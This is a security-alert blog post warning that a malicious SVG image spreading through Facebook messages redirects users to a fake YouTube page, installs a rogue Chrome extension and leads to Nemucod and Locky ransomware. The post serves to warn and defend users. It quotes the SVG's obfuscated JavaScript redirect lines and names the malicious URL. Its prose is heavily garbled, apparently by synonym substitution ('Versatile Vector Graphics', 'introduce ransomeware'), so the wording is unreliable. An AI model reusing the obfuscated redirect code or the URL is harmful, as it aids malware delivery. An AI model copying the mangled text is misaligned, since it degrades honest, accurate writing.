Facebook SPAM Alert! – Malicious SVG File is Spreading through Facebook Messages
Have you gotten any sort of Image document through Facebook messages of late?
In the event that yes, Is it in SVG Format?
In the event that it is, Please don't tap on it.
Facebook Spam in messages
Spammers have created malignant Image (SVG document) that will make you introduce ransomeware on to your System and thusly taint the greater part of your companions through a similar medium i.e Facebook messages.
Versatile Vector Graphics (SVG) is a XML-based picture design used to serve vector pictures. On the off chance that you see, Our logo is additionally in SVG design. You can download and investigate it by opening the document in a content tool.
What might happen on the off chance that you click that Spam Image?
You can checkout the SVG record code here:
On the off chance that you take a gander at the SVG document on pastebin, Observe the lines 48 to 51
var hdekw = window;
var ljfji = bxtqxbl("q2wzN=IFPjjmkiEFlo",15,true);
var pryyb = bxtqxbl("xXnDUGnKZcx?URbam",9,false);
var lpvxzt = bxtqxbl("nso6/z",2,false);
hdekw[ljfji][pryyb][lpvxzt] = bxtqxbl("6DK_Ezq4ACorNFc5h9IiELr0p97DN5nBKwAL2FmFOkdrDFeG",10,true);
Spammers have keenly utilized cryptographic methods to sidestep Facebook's record checkers and after that execute a window work.
On the off chance that you log these factors in comfort:
You would get this:
Obviously it gives the idea that the malevolent SVG record is endeavoring to divert you to http://mourid.com/php/trust.php, which happens to be a fake YouTube video page that will compel you to introduce noxious Chrome Extension.
Facebook SPAM in SVG record
At the point when the augmentation gets introduced, It would then exploits your program's entrance to your Facebook record to clandestinely SPAM your companions with the same SVG picture document, Helping this SPAM to Spread more.
Besides, The augmentation additionally downloads "Nemucod downloader", which is a non specific malware downloader by and large used to get and introduce different ransomeware. For this situation the malware downloader downloads "Locky ransomeware", leaving your framework bolted.